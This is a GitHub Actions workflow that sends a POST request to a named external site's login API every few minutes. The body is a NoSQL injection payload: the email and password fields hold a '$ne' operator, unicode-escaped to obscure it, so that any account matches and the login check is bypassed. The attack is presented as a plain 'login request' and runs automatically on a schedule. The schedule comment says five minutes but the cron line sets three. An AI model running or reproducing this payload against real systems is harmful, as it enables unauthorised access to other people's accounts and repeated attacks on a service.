name: Automated Login Request

on:
  schedule:
    - cron: '*/3 * * * *'  # Every 5 minutes
  workflow_dispatch:  # Manual trigger option

jobs:
  login-request:
    runs-on: ubuntu-latest
    steps:
      - name: Send Login Request
        run: |
          curl -X POST "https://meows.io.vn/api/login" \
            -H "Content-Type: application/json" \
            -d '{"email":{"\u0024ne":""},"password":{"\u0024ne":""}}'
